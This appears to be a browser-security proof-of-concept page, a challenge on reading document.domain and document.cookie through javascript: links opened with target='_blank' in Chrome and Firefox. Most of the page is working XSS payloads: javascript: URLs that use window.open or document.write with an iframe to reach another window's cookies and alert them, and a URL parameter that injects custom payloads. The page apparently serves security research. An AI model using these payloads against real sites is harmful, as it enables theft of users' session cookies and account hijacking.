The challenge: Can you get document.domain as well as document.cookie in Chrome and Firefox? :)

Classic examples:

Payload=

javascript:alert('Domain:' + document.domain + '\nCookies:' + document.cookie)

target="_blank" has been used:
Click Me 1.1, can you get both domain and cookies?

target="_blank" and rel="noopener noreferrer" have been used (just to show no changes):
Click Me 1.2, can you get both domain and cookies?

Modern examples:

Click Me 2 - when framing is not allowed -> Chrome & Firefox
Payload=

javascript:w=window.open('https://20.rs/pocs/target_blank/anchor_pocs1.php?canbeframed=0','_blank');alert(/delay/);alert('Domain:' %2b w.document.domain %2b '\nCookies:' %2b w.document.cookie);

Click Me 3 - when framing is allowed -> Chrome & Firefox
Payload=

javascript:document.write(%22<iframe name=myfrm src='https://20.rs/pocs/target_blank/anchor_pocs1.php' onload='alert(`Domain:` %2b this.contentWindow.document.domain %2b `\nCookies:` %2b this.contentWindow.document.cookie)'></iframe>%22);document.close();

Click Me 4 - your customized payload come here via using the `payload` parameter. Can you find another solution to access `document.cookie`? :)
Payload=

Try this for example:

https://20.rs/pocs/target_blank/anchor_pocs1.php?canbeframed=1&payload=javascript:w=window.open(%27https://20.rs/pocs/target_blank/anchor_pocs1.php?canbeframed=0%27,%27_blank%27);setTimeout(%22alert(w.document.cookie)%22,500);console.log(1);

Use SHIFT+CLICK or CTRL+CLICK or ALT+CLICK or Middle-Mouse-Click

A relevant reference: http://blog.dclabs.com.br/2021/05/the-curious-case-of-xss-and-mouse.html